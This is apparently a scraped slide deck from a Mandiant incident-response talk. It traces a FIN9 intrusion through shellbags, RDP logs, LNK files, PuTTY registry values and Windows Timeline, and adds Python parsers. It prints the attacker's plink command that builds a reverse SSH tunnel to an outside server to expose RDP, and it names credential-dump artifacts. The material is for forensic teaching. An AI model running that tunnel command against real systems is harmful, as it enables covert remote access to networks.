- Paths to directories accessed via Explorer
- Date and time at which the last access occurred
- MAC times of each path tracked in shellbags
Decoding tools
- RegRipper
- shellbags.py: github.com/williballenthin/shellbags
- ShellBags Explorer: https://ericzimmerman.github.io/#!index.md
44
ShellBags
MRU Time | Modified | Accessed | Created | Resource
2019-01-11 03:51:36 | 2018-12-30 02:59:32 | 2016-12-30 02:59:32 | 2017-11-05 14:40:54 | My Computer\C:\Users\ITAdmin [Desktop\0\0\4\3]
2019-01-11 03:51:54 | 2018-05-07 15:54:36 | 2016-11-05 14:40:54 | 2017-11-05 14:40:54 | My Computer\C:\Users\ITAdmin\AppData [Desktop\0\0\4\3\0]
- | - | - | - | My Network Places\hqdc1.com\\hqdc1.com\general [Desktop\2\4\0]
2018-12-25 02:40:59 | 2012-11-11 17:00:06 | 2012-11-11 17:00:06 | 2012-11-11 17:00:06 | My Network Places\hqdc1.com\\hqdc1.com\general\DC01 [Desktop\2\4\0\0]
2018-12-25 02:40:59 | 2014-05-23 21:53:24 | 2018-05-23 21:53:24 | 2011-04-07 12:28:28 | My Network Places\hqdc1.com\\hqdc1.com\general\DC01\ITIO Server Infrastructure [
2019-01-12 03:41:41 | 2017-01-10 14:07:12 | 2017-01-10 14:07:12 | 2017-05-02 13:45:42 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop [Desktop\2\9\0\0\0\0]
2019-01-12 03:42:22 | 2017-01-11 18:42:04 | 2017-01-11 18:42:04 | 2017-01-10 14:06:56 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop\2\9\0\0\0\0\0]
2019-01-12 03:47:49 | 2017-01-05 21:37:52 | 2017-01-05 21:37:52 | 2017-01-05 20:05:26 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop\2\9\0\0\0\0\1]
2019-01-12 03:41:42 | 2016-12-18 14:49:14 | 2016-12-18 14:49:14 | 2015-01-26 19:43:56 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop\2\9\0\0\0\0\2]
2019-01-12 03:53:14 | 2016-12-15 20:57:58 | 2016-12-15 20:57:58 | 2016-11-24 22:18:00 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop\2\9\0\0\0\0\3]
2019-01-12 03:53:47 | 2015-09-23 13:52:10 | 2015-09-23 13:52:10 | 2016-05-02 13:45:42 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\AppData [Desktop\2\9\0\0\0\1]
2019-01-11 03:46:21 | 2016-09-27 13:38:42 | 2016-09-27 13:38:42 | 2016-05-02 13:45:42 | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop\2\9\0\0\0\1\0]
From the ITAdmin profile on this host, Explorer was used to browse frank's profile on 192.168.1.54 over the c$ administrative share and the DC01 share on hqdc1.com.
45
How did the attacker access the host?
§ Remotely installed ScreenConnect
§ Switched tactics: removed ScreenConnect and installed malware
§ Non-interactive malware downloaded and executed plink.exe to create a reverse SSH tunnel:
- plink.exe tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389
- -R 44489:127.0.0.1:3389 makes port 44489 on the attacker's SSH server (reached on port 443) forward to RDP on the victim's loopback interface; -N and -T open no shell or terminal, so the process only carries the tunnel. RDP logons arriving this way show Source Network Address 127.0.0.1.
§ The attacker then connected to the local host using Remote Desktop through the tunnel
Artifact left by plink (PuTTY stores accepted SSH host keys in the registry of the account it ran as):
Key | Value | Data
Software\SimonTatham\PuTTY\SshHostKeys | rsa2@<IP Address> | 0x10001,0x… (SSH public key)
PuTTY names these values <keytype>@<port>:<host>, so the value name also records the attacker's server address and any non-default port.
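Added example, not from the deck: a parser for plink command lines of the form shown above that explains the tunnel being built and derives the SshHostKeys value name PuTTY would leave behind. It handles -L, -R and -D forwards in general, not only the -R case on the slide. The address 203.0.113.5 is a documentation address standing in for the redacted <IP Address>, the password placeholder is kept as on the slide, and the key type rsa2 is assumed from the slide's value name.

```python
# Added example: parse a plink command line and describe the tunnel it creates.
# SAMPLE_ARGS is constructed from the slide; 203.0.113.5 stands in for the redacted server.
from typing import Dict, List


def parse_forward(kind: str, spec: str) -> Dict:
    """-L/-R take [listen_addr:]listen_port:target_host:target_port; -D takes [listen_addr:]port."""
    parts = spec.split(":")
    if kind == "D":
        return {"type": "dynamic", "listen_port": int(parts[-1]), "target": None}
    if len(parts) == 3:
        listen_port, host, port = parts
    elif len(parts) == 4:
        _listen_addr, listen_port, host, port = parts
    else:
        raise ValueError(f"unrecognised forward spec: {spec}")
    return {"type": "remote" if kind == "R" else "local",
            "listen_port": int(listen_port), "target": f"{host}:{port}"}


def parse_plink(args: List[str]) -> Dict:
    """args excludes the program name. Only the switches relevant to tunnelling are interpreted."""
    info = {"user": None, "host": None, "port": 22, "forwards": [], "flags": [],
            "password_on_cmdline": False}
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-L", "-R", "-D"):
            info["forwards"].append(parse_forward(a[1], args[i + 1]))
            i += 2
        elif a == "-P":
            info["port"] = int(args[i + 1])
            i += 2
        elif a == "-l":
            info["user"] = args[i + 1]
            i += 2
        elif a == "-pw":
            info["password_on_cmdline"] = True      # exposed in process listings and EDR telemetry
            i += 2
        elif a in ("-i", "-pwfile", "-m"):          # other switches that take an operand
            i += 2
        elif a in ("-N", "-T", "-C"):
            info["flags"].append({"-N": "no_shell", "-T": "no_pty", "-C": "compression"}[a])
            i += 1
        elif a.startswith("-"):
            i += 1                                   # -2, -4, -ssh, -batch ...: no operand
        else:
            user, _, host = a.rpartition("@")
            info["host"] = host
            if user:
                info["user"] = user
            i += 1
    return info


def hostkey_value_name(info: Dict, keytype: str = "rsa2") -> str:
    """PuTTY stores accepted host keys under Software\\SimonTatham\\PuTTY\\SshHostKeys as <keytype>@<port>:<host>."""
    return f"{keytype}@{info['port']}:{info['host']}"


def describe(info: Dict) -> List[str]:
    out = [f"SSH to {info['host']}:{info['port']} as {info['user'] or '<default user>'}"
           + (" (no shell, tunnel only)" if "no_shell" in info["flags"] else "")]
    for f in info["forwards"]:
        if f["type"] == "remote":
            line = (f"reverse tunnel: connections to port {f['listen_port']} on {info['host']} "
                    f"are delivered to {f['target']} as seen from this host")
            if f["target"].startswith(("127.", "localhost")):
                line += "; resulting logons show Source Network Address 127.0.0.1"
        elif f["type"] == "local":
            line = f"local forward: this host listens on {f['listen_port']} and relays to {f['target']} via {info['host']}"
        else:
            line = f"SOCKS proxy on local port {f['listen_port']} exiting at {info['host']}"
        out.append(line)
    return out


SAMPLE_ARGS = ["tunnel@203.0.113.5", "-pw", "<Password>", "-P", "443", "-2", "-4",
               "-T", "-N", "-C", "-R", "44489:127.0.0.1:3389"]

if __name__ == "__main__":
    parsed = parse_plink(SAMPLE_ARGS)
    print("\n".join(describe(parsed)))
    print("expected registry value:", hostkey_value_name(parsed))
```

The value name is the cheap indicator: any SshHostKeys entry whose port is not 22, or whose host is outside the organisation, on a machine that has no business running an SSH client deserves a look.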
46
Windows 10 Timeline
§ Timeline exists in Task View
- Accessed by hitting Win+Tab
§ Records a timeline of user activity for specific applications
§ Two activity kinds of interest: UserEngaged (application in focus) and generic events (application or content opened)
§ Database location:
- C:\Users\<User>\AppData\Local\ConnectedDevicesPlatform\L.<User>\ActivitiesCache.db (the L.<User> folder name applies to local accounts; for Microsoft or Azure AD accounts the folder is named after an account identifier)
47
Windows Timeline
https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
48
Windows Timeline (continued, same source)
49
Windows Timeline
§ Parsing
- Multiple available tools
  • https://tzworks.net/prototype_page.php?proto_id=41
  • https://github.com/log2timeline/plaso/pull/2076
  • https://ericzimmerman.github.io/#!index.md (WxTCmd)
- SQLite3
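Added example, not from the deck, of the SQLite3 route: query an ActivitiesCache.db with Python's sqlite3 module and render the Start/End/Application/DisplayText/Details columns of the table that follows. The in-memory database is a constructed stand-in containing only the Activity columns the query uses (check the names against a real copy), and the ActivityType mapping 5 = ExecuteOpen, 6 = UserEngaged is the commonly documented one, not something the deck states.

```python
# Added example: read Windows 10 Timeline activities from ActivitiesCache.db with sqlite3.
# build_sample_db() is a constructed stand-in with a subset of the real Activity columns.
import json
import sqlite3
from datetime import datetime, timezone
from typing import List, Optional
from urllib.parse import unquote, urlparse

ACTIVITY_TYPES = {5: "ExecuteOpen", 6: "UserEngaged"}    # commonly documented values


def epoch_utc(ts: Optional[int]) -> Optional[str]:
    """StartTime/EndTime are Unix epoch seconds; 0 means not set."""
    return None if not ts else datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def app_name(app_id_json: str) -> str:
    """AppId is a JSON array of platform/application pairs; prefer the Win32 path entry."""
    entries = json.loads(app_id_json)
    for platform in ("x_exe_path", "windows_win32", "windows_universal"):
        for e in entries:
            if e.get("platform") == platform:
                return e.get("application", "")
    return entries[0].get("application", "") if entries else ""


def content_path(uri: Optional[str]) -> Optional[str]:
    """file:///Z:/Downloads/x.zip -> Z:\\Downloads\\x.zip; other URIs are returned unchanged."""
    if not uri:
        return None
    p = urlparse(uri)
    if p.scheme != "file":
        return uri
    return unquote(p.path).lstrip("/").replace("/", "\\")


def timeline_rows(conn: sqlite3.Connection) -> List[dict]:
    sql = "SELECT AppId, ActivityType, Payload, StartTime, EndTime FROM Activity ORDER BY StartTime"
    rows = []
    for app_id, atype, payload, start, end in conn.execute(sql):
        p = json.loads(payload) if payload else {}
        rows.append({
            "start": epoch_utc(start), "end": epoch_utc(end),
            "application": app_name(app_id),
            "type": ACTIVITY_TYPES.get(atype, f"type_{atype}"),
            "display_text": p.get("displayText") or ACTIVITY_TYPES.get(atype),
            "details": content_path(p.get("contentUri")),
        })
    return rows


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for ActivitiesCache.db; only the columns timeline_rows() reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Activity (Id BLOB, AppId TEXT, ActivityType INT, Payload BLOB, "
                 "StartTime INT, EndTime INT, LastModifiedTime INT)")

    def t(s: str) -> int:
        return int(datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc).timestamp())

    rows = [
        (b"\x01", json.dumps([{"application": r"Wireshark\Wireshark.exe", "platform": "windows_win32"}]), 5,
         json.dumps({"displayText": "capture.flow", "contentUri": "file:///Z:/Downloads/capture.flow"}),
         t("2019-02-12 19:02:27"), 0, t("2019-02-12 19:02:27")),
        (b"\x02", json.dumps([{"application": "Microsoft.MicrosoftEdge", "platform": "windows_universal"}]), 6,
         json.dumps({"type": "UserEngaged", "activeDurationSeconds": 17}),
         t("2019-02-10 13:10:34"), t("2019-02-10 13:10:51"), t("2019-02-10 13:10:51")),
    ]
    conn.executemany("INSERT INTO Activity VALUES (?,?,?,?,?,?,?)", rows)
    return conn


if __name__ == "__main__":
    for r in timeline_rows(build_sample_db()):
        print(r["start"], r["end"], r["application"], r["display_text"], r["details"])
```

Against a real copy, open the file read-only (sqlite3.connect("file:ActivitiesCache.db?mode=ro", uri=True)) and work from a forensic copy of the whole folder, since the WAL file beside the database may hold the most recent activities.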
50
Windows 10 Timeline
Start (UTC) | End (UTC) | Application | DisplayText or Type | Details
2019-02-08 23:04:27 | N/A | WinRAR\WinRAR.exe | sdl-redline.zip | Z:\Downloads\sdl-redline.zip
2019-02-09 01:07:06 | N/A | Cisco.AnyConnect | Cisco AnyConnect Secure Mobility Client | black
2019-02-10 13:09:53 | N/A | Microsoft.MicrosoftEdge | cmd - Bing | https://www.bing.com/search?q=cmd&form=WNSGPH ; http://adaptivecards[.]io/schemas/adaptive-card.json
2019-02-10 13:10:34 | 2019-02-10 13:10:51 | Microsoft.MicrosoftEdge | UserEngaged | https://ericzimmerman.github.io/#!index.md
2019-02-12 13:58:46 | 2019-02-12 13:58:48 | Microsoft.MicrosoftEdge | UserEngaged | https://www.google.com/search?eiadd+on+vpn&oq=add+on+vpn
2019-02-12 13:59:02 | N/A | Wireshark\Wireshark.exe | Wireshark | black
2019-02-12 18:57:11 | N/A | Wireshark\Wireshark.exe | 107.x.x.x-10.24.206.133-1552495684.flow | Z:\Downloads\107.x.x.x-10.24.206.133-1552495684.flow
2019-02-12 19:02:27 | N/A | Wireshark\Wireshark.exe | 104.x.x.x-10.222.7.44-1552442420.flow | Z:\Downloads\104.x.x.x-10.222.7.44-1552442420.flow
2019-02-16 00:47:42 | N/A | Microsoft.MSPaint | Paint 3D | black
2019-02-16 00:50:34 | N/A | Microsoft.MSPaint | Picture2.jpg | Z:\Desktop\Picture2.jpg
2019-02-16 03:16:13 | N/A | mspaint.exe | Picture1.png | Z:\Presentations\DFIR\Picture1.png
2019-02-16 03:16:56 | N/A | mspaint.exe | Picture2.png | Z:\Presentations\DFIR\Picture2.png
2019-02-16 18:41:00 | N/A | WinRAR\WinRAR.exe | 4mXTuLp5E19cNdVvUX9jzb.zip | Z:\Downloads\TuLp5E19cNdVvUX9jzb.zip
2019-02-16 18:41:33 | N/A | Redline\Redline.exe | MBP0074.mans | Z:\MBP0074.mans
51
Attack Diagram
[Diagram: Conference Room PC (reached over the SSH tunnel) --Remote Desktop--> Jump Server --Web Access (1ClickDB)--> Web Server --Direct DB Access--> Database Server]
52
Time | Source | System | Details
2018-12-24 23:11:21 | EventLog | ConfPC | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2018-12-25 00:00:23 | RDP:MRU | ConfPC | Hostname: 192.168.1.38 User: rewards\ITAdmin
2018-12-25 00:33:42 | RDP:MRU | ConfPC | Hostname: RewardsDB User: rewards\DBO
2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\\hqdc1.com\general\DC01 [Desktop\2\4\0\0]
2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\\hqdc1.com\general\DC01\ITIO Server Infrastructure [
2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\AppData [Desktop\2\9\0\0\0\1]
2019-01-01 02:53:11 | RDP:MRU | ConfPC | Hostname: Webserver2 User: rewards\frank
2019-01-11 03:46:21 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop\2\9\0\0\0\1\0]
2019-01-11 03:51:36 | ShellBag:MRU | ConfPC | My Computer\C:\Users\ITAdmin [Desktop\0\0\4\3]
2019-01-11 03:51:54 | ShellBag:MRU | ConfPC | My Computer\C:\Users\ITAdmin\AppData [Desktop\0\0\4\3\0]
2019-01-12 03:41:41 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop [Desktop\2\9\0\0\0\0]
2019-01-12 03:41:42 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop\2\9\0\0\0\0\2]
2019-01-12 03:42:22 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop\2\9\0\0\0\0\0]
2019-01-12 03:47:49 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop\2\9\0\0\0\0\1]
2019-01-12 03:53:14 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop\2\9\0\0\0\0\3]
2019-01-12 03:53:47 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\\hqdc1.com\general [Desktop\2\4\0]
2019-01-15 00:15:01 | RDP:MRU | ConfPC | Hostname: ITJumpserver User: rewards\dave
2019-01-22 00:23:33 | EventLog | ConfPC | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2019-01-22 01:33:23 | EventLog | Jump | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | EventLog | Jump | Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 01:35:34 | Registry:LastWrite | Jump | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
2019-01-22 01:39:03 | LNK:Create Time | Jump | C:\Users\dave\Desktop\result.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
2019-01-22 01:39:23 | FN:Create Time | Jump | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:39:23 | Registry:LastWrite | Jump | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
2019-01-22 01:39:23 | UserAssist:Dave | Jump | C:\Users\dave\Desktop\omg.exe
2019-01-22 01:43:23 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
2019-01-22 01:44:56 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
2019-01-22 01:45:33 | IE:BrowserCache | Jump | Earliest browser cache artifact created
2019-01-22 02:28:01 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
2019-01-22 02:30:12 | IE:BrowserCache | Jump | Most recent browser artifact modified
2019-01-22 02:39:45 | EventLog | Jump | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | EventLog | Jump | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 02:55:45 | EventLog | ConfPC | Remote Desktop Services: Session has been disconnected: User: rewards\ITAdmin Session ID: 2 Source Network Address: 127.0.0.1
The loopback RDP session on ConfPC (00:23:33 to 02:55:45) brackets dave's session on the jump server (01:33:23 to 02:39:45), and ConfPC's RDP MRU shows a connection to ITJumpserver as rewards\dave.
53
Case Study – Expanding View
§ Shellbags
§ RDP Logs
§ RDP Connections
§ LNK Files
§ MRU Keys
§ MUICache
§ Jump Lists
§ RDP Bitmap Cache
§ SimonTatham (PuTTY) Registry Values
§ Windows 10 Timeline
54
Other fun
Artifact | Details
Windows Recycler | C:\$Recycle.Bin\<SID>\$R<RAND>.<EXT> (file content) and $I<RAND>.<EXT> (original path, size and deletion time)
Browser History | ftp://<AttackerWebsite> ; file:///C:/Windows/127.0.0.1.pwdump
OpenWith Registry Keys | Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cachedump\OpenWithList ; Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fgdump-log\OpenWithList
ViClient Logs | C:\Users\admin\AppData\Local\VMware\vpx\viclient-#-0000.log
55
Questions
Phillip.Kealy@Mandiant.com

More Related Content

PDF
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
PPT
Vista Forensics
PPTX
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
PDF
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
PPTX
Splunk n-box-splunk conf-2017
PDF
CNIT 128 3. Attacking iOS Applications (Part 2)
PPTX
Forensicating windows Artifacts investigation without event logs
PDF
CNIT 152 12 Investigating Windows Systems (Part 2)
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
Vista Forensics
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Splunk n-box-splunk conf-2017
CNIT 128 3. Attacking iOS Applications (Part 2)
Forensicating windows Artifacts investigation without event logs
CNIT 152 12 Investigating Windows Systems (Part 2)

Similar to Kealy OWASP interactive_artifacts (20)

PDF
CNIT 121: 12 Investigating Windows Systems (Part 2 of 3)
PDF
12 Investigating Windows Systems (Part 2 of 3)
PDF
CNIT 152: 12b Windows Registry
PPTX
Windows Event Analysis - Correlation for Investigation
PDF
CNIT 121: 12 Investigating Windows Systems (Part 3)
PDF
CNIT 152 12. Investigating Windows Systems (Part 3)
PDF
File000125
PDF
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
PDF
My InfoSec journey led me to create my own IR tools, how, and why you should too
PDF
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
PDF
Logs, Logs, Logs - What you need to know to catch a thief
PDF
Windows Registry Analysis
PPT
Chetan-Mining_Digital_Evidence_in_Microsoft_Windows
PDF
windows-forensics-analysis-v-1.0-4_2.pdf
PPTX
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
PDF
Breach > ATT&CK > Osquery: Cross-platform Endpoint Monitoring with Osquery
DOCX
10 resource kit remote administration tools
PDF
A_forensic_analysis_of_apt_55lateral.pdf
PPT
Malware forensics
CNIT 121: 12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12b Windows Registry
Windows Event Analysis - Correlation for Investigation
CNIT 121: 12 Investigating Windows Systems (Part 3)
CNIT 152 12. Investigating Windows Systems (Part 3)
File000125
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
My InfoSec journey led me to create my own IR tools, how, and why you should too
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
Logs, Logs, Logs - What you need to know to catch a thief
Windows Registry Analysis
Chetan-Mining_Digital_Evidence_in_Microsoft_Windows
windows-forensics-analysis-v-1.0-4_2.pdf
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Breach > ATT&CK > Osquery: Cross-platform Endpoint Monitoring with Osquery
10 resource kit remote administration tools
A_forensic_analysis_of_apt_55lateral.pdf
Malware forensics
Ad

More from Frank Victory (12)

PPTX
Container security Familiar problems in new technology
PPTX
Automation and open source turning the tide on the attackers
PPTX
CNG 256 cloud computing
PPTX
CNG 256 wireless wi-fi and bluetooth
PDF
Differential learning SnowFROC 2017
POTX
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
PPTX
Active defensecombo clean
PPTX
Dns security threats and solutions
PPTX
Cng 125 – chapter 12 network policies
PPTX
Authentication vs authorization
PPTX
9.0 security (2)
PPTX
Lesson 6 web based attacks
Container security Familiar problems in new technology
Automation and open source turning the tide on the attackers
CNG 256 cloud computing
CNG 256 wireless wi-fi and bluetooth
Differential learning SnowFROC 2017
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Active defensecombo clean
Dns security threats and solutions
Cng 125 – chapter 12 network policies
Authentication vs authorization
9.0 security (2)
Lesson 6 web based attacks
Ad

Recently uploaded (20)

PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
KodekX | Application Modernization Development
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
Empathic Computing: Creating Shared Understanding
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PPTX
Big Data Technologies - Introduction.pptx
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PPTX
Cloud computing and distributed systems.
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
Approach and Philosophy of On baking technology
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Network Security Unit 5.pdf for BCA BBA.
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
Dropbox Q2 2025 Financial Results & Investor Presentation
KodekX | Application Modernization Development
The Rise and Fall of 3GPP – Time for a Sabbatical?
Empathic Computing: Creating Shared Understanding
Mobile App Security Testing_ A Comprehensive Guide.pdf
Chapter 3 Spatial Domain Image Processing.pdf
Big Data Technologies - Introduction.pptx
20250228 LYD VKU AI Blended-Learning.pptx
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Reach Out and Touch Someone: Haptics and Empathic Computing
Cloud computing and distributed systems.
Building Integrated photovoltaic BIPV_UPV.pdf
Approach and Philosophy of On baking technology
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Network Security Unit 5.pdf for BCA BBA.
Understanding_Digital_Forensics_Presentation.pptx
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Advanced methodologies resolving dimensionality complications for autism neur...

Kealy OWASP interactive_artifacts

  • 1. 1 Using Interactive Artifacts to Track Attacker Actions § Phillip Kealy
  • 2. 2 Overview § Background § Disclaimer § Presentation Goals § Interactive Artifact Overview § Case Study + Interactive Artifacts § Scaling Investigations using Interactive Artifacts
  • 3. 3 Background § Who am I? § Career - Operational - CIRT - Security Manager - Consulting
  • 4. 4 DISCLAIMER Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
  • 5. 5 Presentation Goals § Define Methods for Interactive Logons § Provide overview of available artifacts § Methods to use multiple evidence sources to provide in-depth story
  • 6. 6 What are Interactive artifacts? § Forensic Artifacts that record user activity during an interactive logon session § Examples of interactive logon sessions: - Physically at the keyboard - Remote Desktop - Third Party Utilities • Screen Connect • VNC • More - PsExec
  • 7. 7 User Profiles What happens upon a user’s first interactive user logon? § Log Entries (More on this shortly) § Creation of user profile - “C:users%USERNAME%” - User registry hives § A user profile can prove an interactive logon occurred, even without event log evidence RDP frank ITJumpServer “C:usersfrank*” created
  • 8. 8 Case Study – FIN9 § Financially Motivated Attacker § Uses minimal malware for initial access and to maintain presence § Exploits business processes and systems for financial gain
  • 9. 9 Targeted Attack Lifecycle – FIN9 • Phishing Email • Word document with macros • Netwire • TeamViewer • ScreenConnect • EMCO • Dameware • NanoCore • MimiKatz • Keystroke logging • Fake Logon Screen • Sticky Keys • Built-in Windows Utilities • Net commands • File shares • Search for systems of interest • Legitimate Access to apps • Direct DB access using 1ClickDB • Remote Desktop • File Shares • Netwire • TeamViewer • ScreenConnect • EMCO • SoftTokenCertificate theft
  • 11. 11 Initial Lead § Fraud Department located Unauthorized Gift Cards issued on January 22, 209 § Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA § Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session on WebServerA using Domain Admin account Frank - RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address § IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer - Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC § Now what? - Live response analysis of WebServerA
  • 12. 12 Windows Logon Events
  Type 2 – Interactive
  - Physical console
  - Screen sharing
  - “RunAs”
  - PsExec
  Type 10 – Remote Interactive
  - Remote Desktop / Terminal Services
  Type 7 – Credentials used to unlock screen
  Type 12 – Cached remote interactive
  Type 13 – Cached unlock
  • 13. 13 Type 10 Logon – RDP
  [Diagram: Unknown System connects over RDP to ITJumpServer; the event below is EID 4624 from the “Rewards” Domain Controller Security Event Log]
  An account was successfully logged on.
  User Name: franktheadmin
  Domain: Rewards
  Logon ID: (0x0,0x151F248)
  Logon Type: 10
  Logon Process: User32
  Authentication Package: Negotiate
  Workstation Name: ITJumpServer
  Source Network Address: 192.168.1.101
  • 14. 14 RDP Event Logs
  Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
  Date & Time          EID   Message
  2019-01-22 01:33:23  1149  Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
  2019-01-22 01:33:23  21    Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
  2019-01-22 02:39:45  23    Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
  2019-01-22 02:39:45  24    Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
  • 15. 15 User Registry Hives
  Registry Hive Paths              Registry Files on Disk
  HKEY_USERS\<User SID>            \Users\<username>\NTUSER.DAT (Windows Vista/2008+)
  HKEY_USERS\<User SID>_Classes    \Users\<username>\AppData\Local\Microsoft\Windows\USRCLASS.DAT (Windows Vista/2008+)
  • 16. 16 LNK Files
  § Windows shortcut files
  § Auto-generated when file opened in Explorer
  § Supports “Recent Files” / “Recent Docs” functionality
  Windows Vista, 7, Server 2008 – LNK File Paths
  C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent
  C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent
  • 17. 17 Data within LNK Files
  § Full file path (local or network)
  § Attributes and logical size
  § MAC timestamps for the referenced file at the time it was last opened
  § Output from “lnkparse.py”
  lnkparse.py - sourceforge.net/projects/jafat/files/lnk-parse/
  • 18. 18 LNK File of interest
  Date & Time          Timestamp                    File Name
  2019-01-22 01:39:23  Created                      C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
  Date & Time          Timestamp                    Referenced file (from LNK contents)
  2019-01-22 01:36:23  Created, Modified, Accessed  C:\Users\dave\Desktop\result.txt
